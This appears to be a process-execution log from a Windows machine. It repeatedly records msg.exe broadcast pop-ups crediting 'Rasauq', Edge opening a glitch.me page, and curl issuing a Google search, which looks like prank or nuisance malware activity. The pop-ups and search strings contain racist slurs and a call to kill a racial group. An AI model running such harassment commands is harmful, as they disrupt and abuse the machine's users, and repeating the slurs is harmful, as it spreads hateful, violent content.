"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6588,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8804,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8852 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=9028,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9068 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8988,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9152 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=9428,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9408 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9532,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9552 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9728,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9516 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9880,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9920 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=10100,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10068 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5652,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10252 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10476,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10436 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10608,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10592,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=560 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10568,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10788 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10784,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10864 /prefetch:8
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=10448,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10952 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=9896,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11144 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=10996,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11348 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=5708,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5720 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11624,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11156 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=11908,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11952 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12116,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12144 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=10860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12152 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12272,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12148 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=12312,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12344 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=12572,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12560 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=12524,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12684 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=12540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12868 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=6208,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
